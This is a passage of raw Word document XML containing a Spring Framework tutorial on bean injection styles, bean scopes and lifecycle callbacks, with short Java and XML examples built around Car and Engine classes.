    </w:p>
    <w:p w14:paraId="0F91A358" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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actory Method Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61342263" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ostConstruct and @PreDestroy for lifecycle management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28180B61" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ingleton and Prototype Beans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7952CB" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ternal Configuration using @Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726A0551" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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pendency Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Constructor or Setter injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685AF0E1" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC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method you choose to define and manage beans will depend on your use case, application size, and preferences (e.g., using XML or JavaConfig in Spring).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0F1235" w14:textId="28B4AB75"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2768AB9">
          <v:rect id="_x0000_i1217" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DEB85E" w14:textId="2961C875" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF49CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc196307552"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain different types of calling beans</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w14:paraId="4746FBF2" w14:textId="39A7279E" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">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specifically in the context of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, there are different types of beans that can be called, injected, or created based on various configurations and lifecycles. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring IoC (Inversion of Control) container</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> handles the management of beans, their creation, initialization, and destruction. Beans in Spring can be accessed and invoked in different ways depending on the configuration style, scope, and injection strategy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093C56A6" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A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Types of Bean Injection in Spring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD4C8B6"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 are the different ways beans can be called and injected in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0024E6FB" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A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 Constructor Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BDDE36"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structor injection is a way to provide dependencies to a bean through its constructor. Spring automatically calls the constructor with the required dependencies when the bean is instantiated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69028BD7"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21BBB79C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397FA2DB"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Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70977476"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Engine engine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5BC8F3" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45391CAB"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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0DB8D8"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Car(Engine engine) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1878FF74"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engine = engine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ECB577"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7FA9C81"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452C786"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 Car has a constructor that takes an Engine object. Spring will automatically inject an instance of Engine when it creates the Car bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BD1E2C" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A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b. Setter Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703B4431"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setter injection, dependencies are provided through setter methods. Spring will call the setter method after the bean has been instantiated, allowing for the injection of dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB3ED36"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0D9FE931"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC1B599"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Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04607C49"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Engine engine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048CBDDC" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="265C6363"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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415D84DD"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setEngine(Engine engine) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBED918"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engine = engine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239B3A26"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51281C6"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20944BA"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case, Spring calls the setEngine() method after the Car bean is instantiated to inject the Engine dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389E4519" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A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c. Field Injection (Direct Injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACDAC66"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eld injection is the simplest form of injection, where Spring directly injects dependencies into fields, bypassing the need for constructor or setter methods. This method is easy to use but can make the class harder to test, as dependencies are tightly coupled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5B8725"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655C51DC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BD4056"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Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7459EDCB"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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39047AAF"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Engine engine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE361D0"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D2C6B63"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 Spring directly injects an instance of Engine into the engine field of the Car bean. Note that this type of injection relies on reflection and annotations, making it less explicit than constructor or setter injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C209480" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A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Types of Bean Scopes in Spring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EDBCAE"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Spring, beans can have different </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scopes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which define their lifecycle and how they are instantiated and managed by the Spring container. The scope of a bean defines how long it lives and how it is shared across the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336C324F" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A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 Singleton Scope (Default Scope)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D2C508" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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inition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A singleton-scoped bean is instantiated once for the entire Spring container. This is the default scope if no scope is defined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DDB6EC" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Singleton beans are shared across the entire application, and any reference to the bean points to the same instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBF4E9B" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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3237661A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1254CC77"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cope("singleton")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A349C9D"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Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F691365"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r bean is created once and shared across the application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D19D3CB"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2DF053D" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A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b. Prototype Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D8BD9E" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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inition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A prototype-scoped bean is instantiated each time it is requested from the Spring container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EF22AC" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Every time a prototype bean is requested, a new instance of the bean is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22121D3E" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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2BF8978F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADB2016"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cope("prototype")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436AF5B6"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Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79611B8F"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 new Car bean is created every time it is requested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6B31FD"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4698643" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A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 Request Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F507987" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46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inition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The bean is created once per HTTP request. This is typically used for web applications where a new bean instance is needed for each HTTP request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D530AEE" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When the HTTP request ends, the bean is destroyed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D732F6" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46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3BCAF3CA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F75FDA"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cope("request")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7425155E"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Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB1BBFF"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 new Car bean is created for each HTTP request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3686016D"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DF179A1" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A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 Session Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D3F6D2" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46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inition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A session-scoped bean is created once per HTTP session. The bean is maintained for the entire duration of the user's session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B0AE41" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The bean is stored in the session and remains available as long as the session is active.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5619D6E4" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46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3855DC85"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F99F2D"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cope("session")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135C586B"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Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B8B6E5"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 new Car bean is created for each HTTP session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414D479B"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CC0EC09" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A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 Application Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202BF03C" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The bean is created once per Spring ServletContext. This scope is typically used for beans that are shared across all sessions and requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ABF4E7" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The bean is created once during the application context initialization and is available throughout the entire application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDF2A37" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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5F637A30"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0653672C"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cope("application")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A9AD65"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Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306DCE30"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 new Car bean is created for the entire application context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8BE0C0"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43A135F" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A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 WebSocket Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3305F376" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47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inition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This scope is used for WebSocket communication. A WebSocket-scoped bean is created once per WebSocket connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0659C871" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The bean is maintained for the duration of the WebSocket session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6B50F9" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47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590E2397"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E784E78"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cope("websocket")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386719AD"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Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6650D1A5"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 new Car bean is created for each WebSocket session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458791F0" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">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CF68CB6" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A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Types of Bean Initialization and Destruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19810ADF"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provides ways to manage the initialization and destruction of beans. These are commonly used for resource management, such as opening or closing connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068ABE18" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A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 Using @PostConstruct and @PreDestroy Annotations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AB5139" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47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ostConstruct</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This annotation is used to specify a method that should be called immediately after the bean's properties have been set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E57BB85" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47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eDestroy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This annotation specifies a method that should be called just before the bean is destroyed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C19F8D"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7D12D3F0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565997CC"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Car {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46213F75"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ostConstruct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048C36E3"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init() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12224B9B"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ar initialized");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BB2212"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E16DF2F" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E7CF553"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eDestroy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADC5687"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cleanup() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F07007"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ar destroyed");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3006A778"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A5361DE"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BDE28C3" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A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b. Using init-method and destroy-method in XML Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CE93A2" w14:textId="77777777" w:rsidR="001A6AD7" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6AD7" w:rsidP="00141A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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se methods can be defined in XML configuration to specify the initialization and destruction methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1402A30B"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443593C5"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t;bean id="car" class="com.example.Car" init-method="init" destroy-method="cleanup"/&gt;</w:t>
      </w:r>
    </w:p>
